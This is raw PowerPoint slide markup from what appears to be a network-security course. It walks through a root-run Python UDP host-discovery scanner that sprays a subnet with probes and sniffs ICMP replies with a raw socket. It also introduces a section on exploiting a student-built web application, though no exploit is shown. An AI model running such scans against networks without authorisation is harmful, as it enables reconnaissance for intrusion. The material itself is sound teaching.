          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This program will need to be run as root since it will be acting as a network sniffer.</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To write the program, we first import the needed libraries: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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A254369-8CD6-495B-9394-7187AAB08D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041913" y="4276684"/>
            <a:ext cx="9372047"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socket</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struct</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ipaddress</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threading</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os</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getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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time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sleep</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4053096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implement a function that sends the UDP packet with a specific message.</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A254369-8CD6-495B-9394-7187AAB08D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640860" y="2596273"/>
            <a:ext cx="9372047"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send_discovery_udp</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msg</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time_to_sleep</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global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> DONE</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host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ipaddress.IPv4Network(host).hosts():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socket.AF_INET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socket.SOCK_DGRAM</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s.sendto</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msg.encode</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(host), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9999</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sleep(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>time_to_sleep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DONE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6432677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implement a function that basically converts any IPv4 from bytes to string:</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A254369-8CD6-495B-9394-7187AAB08D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640860" y="2596273"/>
            <a:ext cx="9372047"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get_ip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first_octet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 &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>24</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ff</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second_octet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 &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>16</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ff</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third_octet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 &gt;&gt; </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ff</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fourth_octet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ff</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.join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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first_octet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second_octet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third_octet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fourth_octet</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0644479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write a function that parses IPv4 data to extract information from it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Before we do so, we should be aware of the structure of an IPv4 packet header</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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, application, table&#10;&#10;Description automatically generated">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EC628D-A657-403A-9924-E7FF556991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2997" y="2595895"/>
            <a:ext cx="7292391" cy="4132028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2347746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we’re aware of the IPv4 format structure, we can write a function to parse it as follows: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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5816BE9E-B36B-4A43-A243-870654321259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713050" y="2368532"/>
            <a:ext cx="9372047" cy="440120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parse_ipv4</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version =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&gt;&gt; </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header_length</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0f</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4</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top =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total_length</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iden</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flags_fs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flags = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags_fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13</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fs = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags_fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1fff</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ttl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9</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proto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"!B"</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9</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header_checksum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src_addr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12</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16</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dst_addr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"!L"</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16</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20</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data =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header_length</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src_addr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get_ip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src_addr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dst_addr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get_ip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dst_addr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(version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_length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total_length</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ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, proto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_checksum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src_addr</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dst_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1032068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we parse the IPv4 header, we proceed further to parse the data it includes. We parse ICMP packets only when the protocol indicated in IPv4 header is ICMP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>That said, we will write a simple function that parses an ICMP packet.</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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5816BE9E-B36B-4A43-A243-870654321259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757166" y="2966101"/>
            <a:ext cx="9372047" cy="95410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parse_icmp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packet_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, code, checksum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B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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data =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packet_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, code, checksum, data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDDF6BF-D130-4135-90F8-B5A78D851AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872033" y="4294633"/>
            <a:ext cx="8963030" cy="2244279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1900394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32343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Once extracted, the ICMP packet will be embedded with an IPv4 packet that we will need to parse IPv4 once again with our previously written function (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>parse_ipv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Next, we will write a function that parses UDP packets to extract the data:</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78</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981755" y="3353354"/>
            <a:ext cx="9372047" cy="73866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parse_udp</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src_port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dest_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, size, checksum = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct.unpack</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H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>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H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H</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return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src_port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dest_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, size, checksum,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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A picture containing website&#10;&#10;Description automatically generated">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02A3D16-90AF-4520-8941-7564EC1A07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146" y="4233177"/>
            <a:ext cx="6649453" cy="2435102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11390364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938992"/>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Now if the UDP data contained within the UDP packet is the same as the one we sent earlier, we know that the host is up/alive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>All the logic is shown in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>start_sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function.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we start sniffing for ICMP packets and parse any incoming packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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79</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981755" y="3826596"/>
            <a:ext cx="9372047" cy="267765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chemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> False</a:t>
            </a:r>
          </a:p>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start_sniffer</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msg</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socket.AF_INET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socket.SOCK_RAW</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socket.IPPROTO_ICMP</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while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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> DONE:</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addr</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s.recvfrom</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65535</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ipv4  = parse_ipv4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>raw_data</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(version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_length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total_length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ttl</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proto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_checksum,src_addr</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dst_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, data) = ipv4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-U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4552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671163" y="213378"/>
            <a:ext cx="1208269" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Web</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27787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 this section, we will study &amp; exploit a web application named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PCPAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>It has been created as a Senior project by two SQU students:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Salim AL-Badi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Khalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ALJabri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PCPAPP is a Programming Competitions Platform. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>More information about the project is provided in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>project’s repository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5680618-A776-4E93-B859-A37FAAD8A22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38181593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check if the IPv4 header protocol matches ICMP, if it is, we parse it. We then parse IPv4 header again since the ICMP packet included IPv4 header in its data.</a:t>
            </a:r>
          </a:p>
          <a:p>
